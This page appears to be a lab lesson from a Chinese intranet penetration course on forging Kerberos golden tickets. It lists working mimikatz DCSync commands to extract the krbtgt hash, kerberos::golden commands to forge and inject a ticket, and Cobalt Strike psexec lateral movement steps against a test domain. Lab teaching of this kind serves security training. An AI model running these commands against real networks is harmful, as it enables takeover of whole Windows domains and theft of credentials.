内网渗透
01基础知识
02域环境的搭建
03工作组权限
04域内权限
05Windows本地认证
06网络认证
07Kerberos协议
08工作组的信息搜集
09域内的信息搜集
10工作组的密码抓取
11域内的密码抓取
12Dcsync原理以及攻击
13RDP密码凭证抓取
14横向移动概述
15IPC$横向移动
16PTH哈希传递
17PTK密钥传递
18PTT票据传递
19PSexec进行横向移动
20SMBexec进行横向移动
21利用WinRM服务进行横向移动
22利用WMI进行横向移动
23用户枚举与喷洒
24用户枚举与喷洒-实验
25Roasting攻击
26Kerberoasting
27黄金票据
28黄金票据-实验
29白银票据
30白银票据-实验
31委派概述
32非约束性委派攻击
33约束性委派攻击
34约束性委派攻击-实验
35基于资源的约束性委派
36基于资源的约束性委派-实验
-
+
首页
28黄金票据-实验
## 域内机器上线域控 1、已控制域内192.168.110.7机器 2、查询当前用户名及所在组  3、查询当前的SID ``` S-1-5-21-2744095687-1279945619-2928600117 ```  4、获取krbtgt用户的hash值 ``` mimikatz lsadump::dcsync /domain:xbxaq.com /user:krbtgt ```  ``` 6d342f0e6752f07076928c15ea90d5f1 ``` 5、通过mimikatz制作黄金票据,并且直接注入到内存中 ``` mimikatz kerberos::golden /user:administrator /domain:xbxaq.com /sid:S-1-5-21-2744095687-1279945619-2928600117 /krbtgt:6d342f0e6752f07076928c15ea90d5f1 /ptt ```   6、横向上线 使用cs中自带的psexec工具 ``` jump psexec 192.168.110.5 test #test为监听器 ```  ## 工作组机器上线域控 已经控制一台工作组机器,得知内网的域名为xbxaq.com  猜测192.168.110.5为域控机器 1、首先将DNS指向域控(改网卡或者hosts文件) ``` echo 192.168.110.5 xbxaq.com >> C:\Windows\System32\drivers\etc\hosts 或者 netsh interface ipv4 add dns 网口名字 DNS ```  2、获取krbtgt的hash值 ``` mimikatz lsadump::dcsync /domain:xbxaq.com /user:krbtgt ```  ``` 6d342f0e6752f07076928c15ea90d5f1 ``` 3、获取SID  ``` S-1-5-21-2466639231-2518717437-756379722 ``` 4、生成黄金票据且直接注入内存中 ``` mimikatz kerberos::golden /user:administrator /domain:xbxaq.com /sid:S-1-5-21-2466639231-2518717437-756379722 /krbtgt:6d342f0e6752f07076928c15ea90d5f1 /ptt ```   5、psexec上线 
毛林
2025年9月7日 11:39
转发文档
收藏文档
上一篇
下一篇
手机扫码
复制链接
手机扫一扫转发分享
复制链接
Markdown文件
PDF文档(打印)
分享
链接
类型
密码
更新密码